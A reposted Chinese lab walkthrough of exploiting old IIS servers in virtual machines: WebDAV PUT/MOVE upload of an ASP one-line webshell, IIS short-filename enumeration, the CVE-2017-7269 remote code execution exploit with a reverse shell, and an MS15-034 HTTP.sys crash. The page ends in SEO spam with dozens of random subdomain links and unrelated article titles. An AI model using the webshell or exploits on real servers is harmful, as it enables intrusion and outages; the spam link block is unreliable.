当前位置: 首页 > wzjs >正文

比特币网站做任务二级域名绑定网站

比特币网站做任务,二级域名绑定网站,以网红引流促业态提升,网站建设服务器维护内容一、IIS任意文件上传漏洞 1、安装Windows2003 2、设置 3、浏览访问Windows2003的IP 访问成功 4、抓包&#xff0c;上传木马 注意里面的PUT和MOVE都必须是大写 在当前页抓包用PUT方式上传一个1.txt文件&#xff0c;内容是木马 <%eval request("cmd")%> 可以…

一、IIS任意文件上传漏洞

1、安装Windows2003

2、设置

3、浏览访问Windows2003的IP

访问成功

4、抓包,上传木马

注意里面的PUT和MOVE都必须是大写

在当前页抓包用PUT方式上传一个1.txt文件,内容是木马

<%eval request("cmd")%>

可以看到201上传成功

接下来把1.txt的内容移动到IP下的1.asp

访问木马

成功访问到

5、用蚁剑测试连接

二、IIS短文件漏洞

1、原理

当后缀小于4时,短文件名产生需要文件(夹)名前缀字符长度大于等于9位

当后缀大于等于4时,文件名前缀字符长度即使为1,也会产生短文件名

2、特征

(1)只显示前6位的字符,后续字符用~1代替。其中数字1是可以递增。如果存在文件名类似的文件,则前面的 6个字符是相同的,后面的数字进行递增

(2)后缀名最长只有3位,超过3位的会生成短文件名,且后缀多余的部分会截断。

(3)所有小写字母都会转换成大写字母

(4)长文件名中包含多个”.”的时候,以文件最后一个”.”作为短文件名的后缀

(5)长文件名前缀/文件夹名字符长度符合0-9和A-Z、a-z范围且需要大于等于9位才会生成短文件名,如果包含空格或者其他部分特殊字符,不论长度均会生成短文件。

3、验证

在win2003的网站目录下新建一个长文件名abcdefghijk.txt,内容写上123

在本机浏览器测试我们刚刚创建的文件,如果是404,则说明存在此短文件名

首先*~1*肯定存在,因为*代表任意位数的字符,在这里表示前六位字符

当我们访问*a~1*时,没返回404,说明不存在这个短文件,因为我们的文件名设置的是abcdefghijk.txt,第一个字符是a

当我们访问a*~1*时,返回404,说明存在,而这也和我们创建的文件名相对应

以此类推就能推测出短文件名

短文件漏洞就是这样用的

三、IIS RCE-CVE-2017-7269

1、在kali上传一个工具

地址:GitHub - g0rx/iis6-exploit-2017-CVE-2017-7269: iis6 exploit 2017 CVE-2017-7269

2、运行工具

用python2运行

python2 文件的绝对路径 要攻击的地址 端口 反弹到哪里的地址 端口

3、再开一个终端,监听我们刚刚开的端口

4、反弹shell成功

5、执行命令

四、HTTP.SYS远程代码执执漏洞

1、打开Windows server2012

2、访问IP

3、下载工具

在kali下载工具,地址:https://github.com/davidjura/MS15-034-IIS-Active-DoS-Exploit-PoC

4、使用工具

cd 进入工具

运行工具

接下来工具要什么我们给什么

第一个是要攻击目标的IP

第二个是要端口

第三个是要攻击目标的路径里有的文件

而我们攻击的目标只能访问到一个图片,不知道他的路径,那么就在网页上点鼠标右键,复制图像链接,粘贴出来就可以看到了

继续运行

返回Windows2012看一下

刚刚已经把我的Windows2012打关机了,这是自动开机以后得状态

5、这样就成功了


文章转载自:

http://Dg7g6hRm.Lwbhw.cn
http://9JIk7UTc.Lwbhw.cn
http://fXegF0dT.Lwbhw.cn
http://TxCK5LYt.Lwbhw.cn
http://AF1seKBI.Lwbhw.cn
http://K7a9cABU.Lwbhw.cn
http://NmUtZSbJ.Lwbhw.cn
http://13lqG0x9.Lwbhw.cn
http://JTrzp3v1.Lwbhw.cn
http://eHs2H9uW.Lwbhw.cn
http://ii7qxch8.Lwbhw.cn
http://NPOssdzJ.Lwbhw.cn
http://73977nrC.Lwbhw.cn
http://zgpSellE.Lwbhw.cn
http://ZX2sPhLk.Lwbhw.cn
http://jZfsNATV.Lwbhw.cn
http://Ae8cCCUS.Lwbhw.cn
http://ed2DqCBY.Lwbhw.cn
http://nt7Pd0lh.Lwbhw.cn
http://k8pBVgr8.Lwbhw.cn
http://AaouqFwn.Lwbhw.cn
http://owuTVC8G.Lwbhw.cn
http://MEI0XH6e.Lwbhw.cn
http://bW1zPr67.Lwbhw.cn
http://Z4RjuRpg.Lwbhw.cn
http://pMcGNGzf.Lwbhw.cn
http://1Vkn6tzJ.Lwbhw.cn
http://85CFaEkT.Lwbhw.cn
http://DyciW505.Lwbhw.cn
http://H20dMG2w.Lwbhw.cn
http://www.dtcms.com/wzjs/664160.html

相关文章:

  • 毕业设计用PHP做旅游网站近期时事热点
  • 网站内容如何建设网站主页设计注意点
  • 制作展示型网站公司哪家好网站换主推关键词会怎么样
  • 个人网站名可以和别人一样吗微信分销小程序
  • php网站开发是学什么的做网站是用ps还是ai
  • 扬州中兴建设有限公司网站wordpress主题公众号
  • 部队网站建设总结山东省和住房建设厅网站首页
  • 个人展示网站模板动漫网站建站
  • 36kr网站用什么做的临淄关键词网站优化首选公司
  • 东莞专业网站营销北京门户网站制作费用
  • 网站 别名展厅展示公司
  • 企业网站推广渠道有哪些高端网站建设公司新鸿儒
  • 大连app网站建设东莞市天气
  • 建网站设置网站首页接手一个新的网站应该怎样做
  • 做电商看的网站有哪些内容公司名字大全免费测吉凶
  • 广州专业网站建设哪家好wordpress能找工作吗
  • 网站建设的费用记什么科目树莓派wordpress穿透
  • 霍邱网站设计公司购物网站的建设意义
  • 怎样创建网站域名平台wordpress主题 付费
  • 构建网站的安全网络搭建视频教程
  • 中国大型网站手机wap网站 设计
  • 温江建设网站ai做的网站怎么切图
  • 网站轮播图片psd源码怎么查网站的域名备案
  • 专业3合1网站建设公司群晖下搭建wordpress
  • 公司备案号查询网站网址大全123手机版下载
  • 广州市研发网站建设平台主机宝怎么设置网站主页
  • 滕州网站建展会宣传推广计划
  • 绵阳网站改版个人可以建立网站吗
  • 杭州集团网站建设做设计的一般在什么网站找素材
  • 深圳建设注册中心网站视频网站开发教程